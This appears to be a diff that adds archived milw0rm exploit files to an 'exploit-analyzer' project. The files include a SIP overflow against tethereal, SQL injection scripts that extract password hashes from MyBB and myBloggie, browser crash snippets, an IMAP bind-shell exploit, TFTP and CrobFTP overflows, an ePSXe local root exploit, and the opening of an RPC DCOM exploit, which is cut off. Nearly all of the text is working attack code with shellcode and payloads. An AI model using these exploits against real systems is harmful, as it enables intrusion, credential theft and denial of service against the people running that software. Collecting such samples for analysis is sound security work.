+"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x68\x61\x63\x6b\x3a"
+"\x39\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74"
+"\x68\x3a\x20\x30\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72"
+"\x64\x73\x3a\x20\x37\x30\x0a\x55\x73\x65\x72\x2d\x41\x67\x65"
+"\x6e\x74\x3a\x20\x57\x30\x30\x64\x70\x33\x63\x6b\x33\x72\x20"
+"\x0a";
+int main(int argc, char * argv[]) {
+unsigned int i, offset, ret, p_addr;
+struct sockaddr_in dest;
+struct hostent *he;
+int sock, slen = sizeof(struct sockaddr);
+unsigned char buffer[2048];
+// help output
+if(argc < 3) {
+printf("correct syntax: %s <flag> <host> \n", argv[0]);
+printf("possible flag: \n");
+printf("1 the ethereal user has started tethereal"
+"with full path as root \n");
+printf("2 the ethereal user has started tethereal"
+"without directorypath as root \n");
+return 1;
+}
+// p_addr may differ on other systems ;)
+if (argv[1][0] == '1') {
+p_addr = 0xbffee328;
+}
+if (argv[1][0] == '2') {
+p_addr = 0xbffee338;
+}
+// destination-ip check
+if((he = gethostbyname(argv[2])) == NULL) {
+printf("[!] Couldn't resolve %s\n", argv[2]);
+return 1;
+}
+// open socket
+if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
+perror("socket()");
+return 1;
+}
+// set packet parameters
+dest.sin_port = htons(5060);
+dest.sin_family = AF_INET;
+dest.sin_addr = *((struct in_addr *)he->h_addr);
+// set the returnaddress (may differ on other systems)
+ret = 0xbffee240;
+//// generate a buffer containing the data ////
+offset = 0;
+// set all values of the buffer to 0x0
+memset(buffer, 0x0, sizeof(buffer));
+// copy the header into the buffer
+memcpy(buffer+offset, sip_header, sizeof(sip_header));
+offset += sizeof(sip_header) -1;
+// concat the callid into the buffer
+memcpy(buffer+offset, callid, sizeof(callid));
+offset += sizeof(callid) -1;
+// add the callid-value (nop+shellcode)
+i = 128 - sizeof(shellcode) +1;
+memset(buffer+offset, 0x90, i);
+offset += i;
+// insert shellcode into buffer
+memcpy(buffer+offset, shellcode, sizeof(shellcode));
+offset += sizeof(shellcode) -1;
+// concat the cseq
+memcpy(buffer+offset, cseq, sizeof(cseq));
+offset += sizeof(cseq) -1;
+// generate the part, which causes the overflow (=cseq-method)
+memcpy(buffer+offset, cseq_method, sizeof(cseq_method));
+offset += sizeof(cseq_method) -1;
+// fill the rest of cseq_method with A
+memset(buffer+offset, 0x41, 30);
+offset += 30;
+// write return address
+*(long *)&buffer[offset] = ret;
+offset += 4;
+// repair the first pointer after ret- address
+*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1
+offset += 4;
+// repair second pointer after ret- address
+*(long *)&buffer[offset] = p_addr;
+offset += 4;
+// the finalising part of the message
+memcpy(buffer+offset, sip_footer, sizeof(sip_footer));
+// send the buffer to the victim
+if (sendto(sock, buffer, sizeof(buffer), 0,
+(struct sockaddr *)&dest, slen)== -1) {
+printf("[!] Error sending packet!\n");
+return 1;
+}
+// DEBUG //
+// printf("%s\n", buffer);
+printf("[*] dark W00dp3ck3r packet sent!\n");
+close(sock);
+return 0;
+}
+// milw0rm.com [2005-05-31]

exploit-analyzer/exploits/exploit_1022.txt ADDED Viewed

	@@ -0,0 +1,31 @@

+#!/usr/bin/perl -w
+#
+# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
+# This exploit show the MD5 crypted password of the user id you've chose
+# Related advisory:
+# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
+# http://fain182.badroot.org
+# http://www.codebug.org
+# Discovered by Alberto Trivero and coded with FAiN182
+use LWP::Simple;
+print "\n\t===========================================\n";
+print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
+print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
+print "\t===========================================\n\n";
+if(!$ARGV[0] or !$ARGV[1]) {
+   print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.example.com/mybb/ 1\n";
+   exit(0);
+}
+$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
+$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
+print "[+] Connected to: $ARGV[0]\n";
+$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
+print "[-] Unable to retrieve User ID\n" if(!$1);
+$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
+print "[-] Unable to retrieve hash of password\n" if(!$1);
+# milw0rm.com [2005-05-31]

exploit-analyzer/exploits/exploit_1023.txt ADDED Viewed

	@@ -0,0 +1,37 @@

+#!/usr/bin/perl -w
+#
+# SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
+# This exploit show the username of the administrator of the blog and his password crypted in MD5
+# Related advisories: (Italian) http://www.codebug.org/index.php?subaction=showfull&id=1115310052&archive=&start_from=&ucat=6&
+#                     (English) http://www.packetstormsecurity.org/0505-advisories/codebug-9.txt
+# Patch: http://mywebland.com/forums/viewtopic.php?t=180
+# Coded by Alberto Trivero and Discovered with CorryL
+use LWP::Simple;
+print "\n\t=======================================\n";
+print "\t= Exploit for myBloggie 2.1.1 - 2.1.2 =\n";
+print "\t=    Alberto Trivero - codebug.org    =\n";
+print "\t=======================================\n\n";
+if(!$ARGV[0] or !($ARGV[0]=~/http/) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and $ARGV[1] ne '2.1.2')) {
+   print "Usage:\nperl $0 [full_target_path] [version: 2.1.1 OR 2.1.2]\n\nExample:\nperl $0 http://www.example.com/mybloggie/ 2.1.1\n";
+   exit(0);
+}
+$url=q[index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*];
+$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
+print "[+] Connected to: $ARGV[0]\n";
+if($ARGV[1] eq '2.1.1') {
+   $page=~m/<tr><td colspan="3" class="subject">(.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n";
+   print "[-] Unable to retrieve username\n" if(!$1);
+}
+else {
+   $page=~m/<img src="templates\/aura\/images\/permalink.gif" border="0" title="Permalink"><\/a> (.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n";
+   print "[-] Unable to retrieve username\n" if(!$1);
+}
+$page=~m/<tr><td colspan="3" class="message">(.*?)<\/td><\/tr>/ && print "[+] MD5 hash of password is: $1\n";
+print "[-] Unable to retrieve hash of password\n" if(!$1);
+# milw0rm.com [2005-05-31]

exploit-analyzer/exploits/exploit_1024.txt ADDED Viewed

	@@ -0,0 +1,7 @@

+<script>
+window.onerror=new Function("history.go(0)");
+function btf(){btf();}
+btf();
+</script>
+# milw0rm.com [2005-05-31]

exploit-analyzer/exploits/exploit_1025.txt ADDED Viewed

	@@ -0,0 +1,3 @@


1	+ <body onLoad="window()">
2	+
3	+ # milw0rm.com [2005-05-31]

exploit-analyzer/exploits/exploit_1026.txt ADDED Viewed

	@@ -0,0 +1,273 @@

+//**************************************************************************
+// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
+// Vulnerability
+//
+// Bind Shell POC Exploit for Japanese Win2K SP4
+// 31 May 2005
+//
+// This POC code binds shell on port 2001 of a vulnerable e-Post
+// SPA-PRO Mail @Solomon IMAP server.
+//
+// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
+// Any changes to the mailbox configuration will cause this POC to
+// fail due to the length differences.
+//
+//
+// Advisory
+// http://www.security.org.sg/vuln/spa-promail4.html
+// http://www.security.org.sg/vuln/spa-promail4-jp.html
+//
+//**************************************************************************
+#include <stdio.h>
+#include <conio.h>
+#include <winsock2.h>
+#include <windows.h>
+#pragma comment (lib,"ws2_32.lib")
+unsigned char expBuf[] =
+"2 create \""
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3"
+"\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08"
+"\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24"
+"\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B"
+"\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74"
+"\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7"
+"\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04"
+"\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89"
+"\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C"
+"\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B"
+"\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A"
+"\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33"
+"\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50"
+"\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75"
+"\xD0\xFF\xD3\x8B\xCC\x6A\x10\x8B\xDC\x68\x35\x54\x8A\xA1\x56\xFF"
+"\xD7\x5A\x50\x50\x53\x51\xFF\x75\xD0\xFF\xD2\x8B\xD0\x68\xE7\x79"
+"\xC6\x79\x56\xFF\xD7\x58\x89\x45\xF0\x8B\x75\xF4\x83\xC4\x20\xC6"
+"\x04\x24\x44\xC6\x44\x24\x2D\x01\x89\x54\x24\x38\x89\x54\x24\x3C"
+"\x89\x54\x24\x40\x8B\xC4\x8D\x58\x44\x68\x72\xFE\xB3\x16\x56\xFF"
+"\xD7\x5A\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51\x8B\xCC\x53\x53\x50"
+"\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51\x50\xFF\xD2\x5B\x68\xAD"
+"\xD9\x05\xCE\x56\xFF\xD7\x58\x6A\xFF\xFF\x33\xFF\xD0\xFF\x74\x24"
+"\x48\xFF\x55\xF0\xFF\x75\xD0\xFF\x55\xF0\x68\xEF\xCE\xE0\x60\x56"
+"\xFF\xD7\x58\xFF\xD0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\xe9\x4f\xfe\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x54\x54\x54\x54"
+"\x55\x55\x55\x55\x56\x56\x56\x56\x57\x57\x57\x57\xE9\x0C\xFE\xFF"
+"\xFF\xCC\xEB\xa0\x5A\xD6\x19\xF8\x74\x41\x41\x41\x42\x42\x42\x42"
+"\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"
+"\x47\x47\x47\x47\x48\x48\x48\x48\x36\x49\x49\x49\x4A\x4A\x4A\x4A"
+"\x4B\x4B\x4B\x4B\x4C\x4C\x4C\x4C\x4D\x4D\x4D\x4D\x4E\x4E\x4E\x4E"
+"\x4F\x4F\x4F\x4F\x50\x50\x50\x50\x51\x51\x51\x51\x52\x52\x52\x52"
+"\x53\x53\x53\x53\x54\x54\x54\x54\x55\x55\x55\x55\x56\x56\x56\x56"
+"\x57\x57\x57\x57\x58\x58\x58\x58\x59\x59\x59\x59\x5A\x5A\x5A\x5A"
+"\"\r\n";
+void shell(int sockfd)
+{
+	char buffer[1024];
+	fd_set rset;
+	FD_ZERO(&rset);
+	for(;;)
+	{
+		if(kbhit() != 0)
+		{
+			fgets(buffer, sizeof(buffer) - 2, stdin);
+			send(sockfd, buffer, strlen(buffer), 0);
+		}
+		FD_ZERO(&rset);
+		FD_SET(sockfd, &rset);
+		timeval tv;
+		tv.tv_sec = 0;
+		tv.tv_usec = 50;
+		if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
+		{
+			printf("select error\n");
+			break;
+		}
+		if(FD_ISSET(sockfd, &rset))
+		{
+			int n;
+			ZeroMemory(buffer, sizeof(buffer));
+			if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
+			{
+				printf("EOF\n");
+				return;
+			}
+			else
+			{
+				fwrite(buffer, 1, n, stdout);
+			}
+		}
+	}
+}
+#define ADDR_POSITION		534
+#define RET_ADDR			0x74F819D6		// CALL EBX in Japanese Win2K SP4
+// First short jump backwards. (EB AO)
+// You should know what to change here, landing onto INT 3 to let debugger kick in.
+#define FIRST_BACKJMP_INST	0x5AA0EBCC
+int main(int argc, char* argv[])
+{
+	WORD wVersionRequested;
+	WSADATA wsaData;
+	struct sockaddr_in sin;
+	int err;
+	char inBuffer[10000];
+	char loginBuf[1000];
+	if(argc != 4)
+	{
+		printf("\nUsage: %s <imap username> <imap password> <ip addr>\n", argv[0]);
+		return 1;
+	}
+	if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20)
+	{
+		printf("\nInvalid IMAP username!  Maximum username length is 20.\n");
+		return 1;
+	}
+	if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14)
+	{
+		printf("\nInvalid IMAP password!  Maximum password length is 14.\n");
+		return 1;
+	}
+	memset(loginBuf, 0, sizeof(loginBuf));
+	_snprintf(loginBuf, sizeof(loginBuf), "1 login \"%s\" \"%s\"\r\n", argv[1], argv[2]);
+	loginBuf[sizeof(loginBuf)-1] = 0;
+	int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);
+	*((DWORD *)&expBuf[retPos]) = RET_ADDR;
+	*((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;
+	wVersionRequested = MAKEWORD(2,0);
+	err = WSAStartup(wVersionRequested, &wsaData);
+	if(err != 0)
+	{
+		printf("\nWSAStartup Error.\n");
+		return 1;
+	}
+	if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
+	{
+		printf("\nWinsock Version Error\n");
+		WSACleanup();
+		return 1;
+	}
+	SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
+	sin.sin_addr.s_addr = inet_addr(argv[3]);
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(143);
+	printf("\n[+] Trying to connect to %s\n", inet_ntoa(sin.sin_addr));
+	if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
+	{
+		int size;
+		// read IMAP banner
+		size = recv(s, inBuffer, sizeof(inBuffer), 0);
+		if(size == SOCKET_ERROR)
+		{
+			printf("[-] Error receiving IMAP banner!\n");
+			return 1;
+		}
+		printf("[+] IMAP banner received!\n\n");
+		fwrite(inBuffer, 1, size, stdout);
+		printf("\n");
+		if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR)
+		{
+			printf("[-] Error sending login!\n");
+			return 1;
+		}
+		printf("[+] Login Sent.\n");
+		size = recv(s, inBuffer, sizeof(inBuffer), 0);
+		if(size == SOCKET_ERROR)
+		{
+			printf("[-] Error receiving login reply!\n");
+			return 1;
+		}
+		if(strstr(inBuffer, "OK"))
+			printf("[+] Login successful!\n");
+		else
+		{
+			printf("[+] Login failed!\n");
+			return 1;
+		}
+		if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
+		{
+			printf("[-] Error sending exploit!\n");
+			return 1;
+		}
+		else
+		{
+			printf("[+] Exploit sent!\n");
+		}
+		Sleep(2000);
+		//================================= Connect to the target ==============================
+		SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
+		if(sock == INVALID_SOCKET)
+		{
+			printf("Invalid socket return in socket() call.\n");
+			WSACleanup();
+			return -1;
+		}
+		sin.sin_family = AF_INET;
+		sin.sin_port = htons(2001);
+		sin.sin_addr.s_addr = inet_addr(argv[3]);
+		if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
+		{
+			printf("Exploit Failed. SOCKET_ERROR return in connect call.\n");
+			closesocket(sock);
+			WSACleanup();
+			return -1;
+		}
+		printf("[+] Exploit successful!\n\n");
+		shell(sock);
+		closesocket(sock);
+	}
+	else
+	{
+		printf("[-] Cannot connect!\n");
+	}
+	closesocket(s);
+	WSACleanup();
+	return 0;
+}
+// milw0rm.com [2005-06-02]

exploit-analyzer/exploits/exploit_1027.txt ADDED Viewed

	@@ -0,0 +1,115 @@

+/*
+*
+* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
+* http://www.futuresoft.com/products/lit-tftp2000.htm
+* Bug Discovered by SIG^2 (http://www.security.org.sg)
+* Exploit coded By ATmaCA
+* Web: atmacasoft.com && spyinstructors.com
+* E-Mail: atmaca@icqmail.com
+* Credit to kozan
+* Usage:tftp_exp <targetIp> [targetPort]
+*
+*/
+/*
+*
+* Vulnerable Versions:
+* TFTP Server 2000 Evaluation Version 1.0.0.1
+*
+*/
+#include <windows.h>
+#include <stdio.h>
+#pragma comment(lib, "ws2_32.lib")
+/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
+char expbuffer[] =
+"\x00\x01"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x58\x58\x58\x58" /* EIP */
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"
+"\x69\x00";
+void main(int argc, char *argv[])
+{
+        WSADATA wsaData;
+        WORD wVersionRequested;
+        struct hostent *pTarget;
+        struct sockaddr_in sock;
+        SOCKET mysocket;
+        int destPORT = 69;//Default to 69
+        if (argc < 2){
+                printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n");
+                printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");
+                printf("Bug Discovered by SIG^2 (http://www.security.org.sg)\n");
+                printf("Exploit coded By ATmaCA\n");
+                printf("Web: atmacasoft.com && spyinstructors.com\n");
+                printf("E-Mail: atmaca@icqmail.com\n");
+                printf("Credit to kozan\n");
+                printf("Usage:tftp_exp <targetIp> [targetPort]\n");
+                return;
+        }
+        if (argc==3)
+                destPORT=atoi(argv[2]);
+        printf("Requesting Winsock...\n");
+        wVersionRequested = MAKEWORD(1, 1);
+        if (WSAStartup(wVersionRequested, &wsaData) < 0) {
+                printf("No winsock suitable version found!");
+                return;
+        }
+        mysocket = socket(AF_INET, SOCK_DGRAM	, 0);
+        if(mysocket==INVALID_SOCKET){
+                printf("Can't create UDP socket\n");
+                exit(1);
+        }
+        printf("Resolving Hostnames...\n");
+        if ((pTarget = gethostbyname(argv[2])) == NULL){
+                printf("Resolve of %s failed\n", argv[1]);
+                exit(1);
+        }
+        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
+        sock.sin_family = AF_INET;
+        sock.sin_port = htons(destPORT);
+        printf("Connecting...\n");
+        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
+                printf("Couldn't connect to host.\n");
+                exit(1);
+        }
+        printf("Connected!...\n");
+        Sleep(10);
+        printf("RRQ->Sending packet. Size: %d\n",sizeof(expbuffer));
+        if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){
+                printf("Error sending packet\n");
+                closesocket(mysocket);
+                exit(1);
+        }
+        printf("Packet sent........\n");
+        printf("Success.\n");
+        closesocket(mysocket);
+        WSACleanup();
+}
+// milw0rm.com [2005-06-02]

exploit-analyzer/exploits/exploit_1028.txt ADDED Viewed

	@@ -0,0 +1,157 @@

+/*
+ * CrobFTP remote stack overflow PoC
+ * ---------------------------------
+ * Tested on Crob FTP Server 3.6.1, Windows XP
+ *
+ * Coded by Leon Juranic <ljuranic@lss.hr>
+ * LSS Security / http://security.lss.hr
+ *
+ */
+#include <stdio.h>
+#include <windows.h>
+#include <time.h>
+#pragma comment (lib,"ws2_32")
+char *fzz_recv (int sock)
+{
+	fd_set fds;
+	struct timeval tv;
+	static char buf[10000];
+	char *ptr=buf;
+	int n;
+	tv.tv_sec = 5;
+	tv.tv_usec = 0;
+	FD_ZERO(&fds);
+	FD_SET(sock,&fds);
+	if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
+		if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
+		buf[n-1] = '\0';
+		printf ("RECV: %s\n",buf);
+		return buf;
+	}
+	else {
+		return NULL;
+	}
+}
+int login (int sock, char *user, char *pass)
+{
+	char buf[1024], *bla;
+	bla=fzz_recv(sock);
+	printf ("recv: %s\n",bla);
+	sprintf (buf,"USER %s\r\n",user);
+	send (sock,buf,strlen(buf),0);
+	bla=fzz_recv(sock);
+	printf ("recv: %s\n",bla);
+	sprintf (buf,"PASS %s\r\n",pass);
+	send (sock,buf,strlen(buf),0);
+	bla=fzz_recv(sock);
+	printf ("recv: %s\n",bla);
+	if (strcmp("230",bla) != NULL)
+		return 0;
+	else return -1;
+	return 0;
+}
+void lame_sploit (char *pack, char *user, char *pass)
+{
+	WORD wVersionRequested;
+	WSADATA wsaData;
+	int sock, err,x;
+	struct sockaddr_in sin;
+	char buf[2000],tmp[1000];
+	char *shell=				// 5 min. XP SP1 shellcode
+		"\x33\xc0"				// xor eax,eax
+		"\x50"					// push eax (\0)
+		"\x68\x2e\x65\x78\x65"  // push '.exe'
+		"\x68\x63\x61\x6c\x63"  // push 'calc'
+		"\x54"					// push esp
+		"\xba\x44\x80\xc2\x77"  // mov  edx, 77c28044
+		"\xff\xd2";				// call edx  (system)
+	wVersionRequested = MAKEWORD( 2, 2 );
+	err = WSAStartup( wVersionRequested, &wsaData );
+	if ( err != 0 ) {
+		printf ("ERROR: Sorry, cannot create socket!!!\n");
+		ExitProcess(-1);
+	}
+	sock=socket(AF_INET,SOCK_STREAM,0);
+	sin.sin_family=AF_INET;
+	sin.sin_addr.s_addr = inet_addr(pack);
+	sin.sin_port = htons(21);
+	if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
+		printf ("CONNECT :(((\n");
+		ExitProcess(-1);
+	}
+	if (login(sock,user,pass) == -1)
+	{
+		printf ("ERROR: Cannot login to FTP server, sorry!!!\n");
+		exit(-1);
+	}
+	memset(tmp,0,sizeof(tmp));
+	memset (tmp,0x90,180);
+	memcpy (&tmp[80],shell,strlen(shell));
+	*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
+	*(long*)&tmp[166] = 0x74ec8390; //		  sub esp,0x74
+	*(long*)&tmp[170] = 0x9090e4ff; //		  jmp esp
+	_snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);
+	printf ("DEBUG: %.30s %d\n",buf,strlen(buf));
+	send (sock,buf,strlen(buf),0);
+	printf ("%s\n",fzz_recv(sock));
+	strcpy(buf,"RMD ");
+	for (x=0;x<276;x++)
+		strcat (buf,".../");
+	strcat(buf,"\r\n");
+	printf ("Sending exploit strings\n");
+	send (sock,buf,strlen(buf),0);
+	printf ("recv: %s\n",fzz_recv(sock));
+}
+main (int argc, char **argv)
+{
+	printf ("CrobFTP Stack overflow PoC \n"
+		    "Coded by Leon Juranic <ljuranic@lss.hr>\n"
+			"LSS Security / http://security.lss.hr/\n");
+	if (argc < 4 ) {
+		printf ("\nusage: %s <target_IP> <user> <pass>\n",argv[0]);
+		exit(-1);
+	}
+	lame_sploit(argv[1],argv[2],argv[3]);
+}
+// milw0rm.com [2005-06-03]

exploit-analyzer/exploits/exploit_1029.txt ADDED Viewed

	@@ -0,0 +1,87 @@

+/* epsxe-e.c
+           ePSXe v1.* local exploit
+By: Qnix
+e-mail: q-nix[at]hotmail[dot]com
+ePSXe-website: www.epsxe.com
+EXP-Sample:
+root@Qnix:~/epsxe# gcc -o epsxe-e epsxe-e.c
+root@Qnix:~/epsxe# ./epsxe-e
+*************************************
+      ePSXe v1.* local exploit
+                 by
+   Qnix  | Q-nix[at]hotmail[dot]com
+*************************************
+[~] Stack pointer (ESP) : 0xbffff568
+[~] Offset from ESP     : 0x0
+[~] Desired Return Addr : 0xbffff568
+* Running ePSXe emulator version 1.6.0.
+* Memory handlers init.
+sh-2.05b# id
+uid=0(root) gid=0(root)
+groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
+*/
+#include <stdlib.h>
+char shellcode[] =
+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
+"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+"\x68";
+unsigned long sp(void)
+{ __asm__("movl %esp, %eax");}
+int main(int argc, char *argv[])
+{
+   int i, offset;
+   long esp, ret, *addr_ptr;
+   char *buffer, *ptr;
+   offset = 0;
+   esp = sp();
+   ret = esp - offset;
+printf("\n ************************************* \n");
+printf("      ePSXe v1.* local exploit          \n");
+printf("                 by                  \n");
+printf("   Qnix  | Q-nix[at]hotmail[dot]com   ");
+printf("\n ************************************* \n\n");
+printf("[~] Stack pointer (ESP) : 0x%x\n", esp);
+printf("[~] Offset from ESP     : 0x%x\n", offset);
+printf("[~] Desired Return Addr : 0x%x\n\n", ret);
+buffer = malloc(600);
+ptr = buffer;
+addr_ptr = (long *) ptr;
+for(i=0; i < 600; i+=4)
+{ *(addr_ptr++) = ret; }
+for(i=0; i < 200; i++)
+{ buffer[i] = '\x90'; }
+ptr = buffer + 200;
+for(i=0; i < strlen(shellcode); i++)
+{ *(ptr++) = shellcode[i]; }
+buffer[600-1] = 0;
+execl("./epsxe", "epsxe", "-nogui", buffer, 0);
+free(buffer);
+   return 0;
+}
+// milw0rm.com [2005-06-04]

exploit-analyzer/exploits/exploit_103.txt ADDED Viewed

	@@ -0,0 +1,264 @@

+/*
+        RPCDCOM2.c  ver1.1
+        copy by FLASHSKY flashsky at xfocus.org  2003.9.14
+   */
+#include <stdio.h>
+#include <winsock2.h>
+#include <windows.h>
+#include <process.h>
+#include <string.h>
+#include <winbase.h>
+unsigned char bindstr[]={
+0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
+0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
+0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
+0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
